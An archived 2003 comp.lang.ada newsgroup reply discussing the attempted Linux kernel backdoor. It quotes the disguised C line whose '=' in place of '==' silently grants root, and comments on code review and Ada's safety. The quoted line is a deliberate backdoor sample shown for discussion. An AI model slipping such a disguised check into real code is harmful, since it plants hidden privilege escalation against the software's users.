From mboxrd@z Thu Jan  1 00:00:00 1970
X-Spam-Checker-Version: SpamAssassin 3.4.4 (2020-01-24) on polar.synack.me
X-Spam-Level: 
X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00 autolearn=ham
	autolearn_force=no version=3.4.4
X-Google-Language: ENGLISH,ASCII-7-bit
X-Google-Thread: 103376,71171f53c22d92b5
X-Google-Attributes: gid103376,public
X-Google-ArrivalTime: 2003-11-12 10:18:07 PST
Path: 
 archiver1.google.com!news2.google.com!news.maxwell.syr.edu!elnk-pas-nf1!elnk-nf2-pas!newsfeed.earthlink.net!sjc70.webusenet.com!news.webusenet.com!nf3.bellglobal.com!nf1.bellglobal.com!nf2.bellglobal.com!news20.bellglobal.com.POSTED!not-for-mail
From: "Warren W. Gay VE3WWG" <ve3wwg@cogeco.ca>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US;
 rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
Newsgroups: comp.lang.ada
Subject: Re: C's trikery semantic opens up backdoor in new Linux kernel
References: <3FB1A63C.9080200@nowhere.com>
 <8Eisb.14119$hB5.9208@nwrdny02.gnilink.net>
 <pan.2003.11.12.05.13.39.401308@Smoke>
 <bosmuu$1hui4o$1@ID-175126.news.uni-berlin.de>
In-Reply-To: <bosmuu$1hui4o$1@ID-175126.news.uni-berlin.de>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Message-ID: <tBusb.4687$kA6.215815@news20.bellglobal.com>
Date: Wed, 12 Nov 2003 13:03:39 -0500
NNTP-Posting-Host: 198.96.223.163
X-Complaints-To: abuse@sympatico.ca
X-Trace: news20.bellglobal.com 1068660185 198.96.223.163 (Wed,
 12 Nov 2003 13:03:05 EST)
NNTP-Posting-Date: Wed, 12 Nov 2003 13:03:05 EST
Organization: Bell Sympatico
Xref: archiver1.google.com comp.lang.ada:2429
Date: 2003-11-12T13:03:39-05:00
List-Id: <comp.lang.ada>

Vinzent 'Gadget' Hoefler wrote:
> J Cusick wrote:
>>On Wed, 12 Nov 2003 04:26:44 +0000, Stephane Richard wrote:
>>>For some reason, I can't open that link you posted here..
>>
>>The Register site seems to be down at the moment... The link is good.
>>
>>The article discusses the fact that someone tried to slide in a C line 
>>(actually 2 lines) that trashed the tcp stack allowing a negative offset
> 
> No. It is worse than that.
> 
> The interesting line in question is this one:
> 
> |if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
> 
> First this looks like a sanity check. But look closer. This single
> line serves one single purpose: to give you root-privileges when you
> just pass the right flags. Note the "current->uid = 0" instead of
> "current->uid == 0". Who the hell had the ******* bad idea that
> assignments could return values?

It was a matter of time before this happened. But to be fair to
C, this is a problem with any large body of code. How carefully
is every source line submission scrutinized?

As the quantity of code increases, the likelyhood of some other
subtle change like this being introduced increases. Linux as
Open Source enjoys the advantage of many eyes, which helps. But
it also enjoys the slight disadvantage of "many submissions" as
well ;-)

I do accept that Ada95 would make this more difficult to do,
but this seems to be all academic talk for the moment ;-)

-- 
Warren W. Gay VE3WWG
http://home.cogeco.ca/~ve3wwg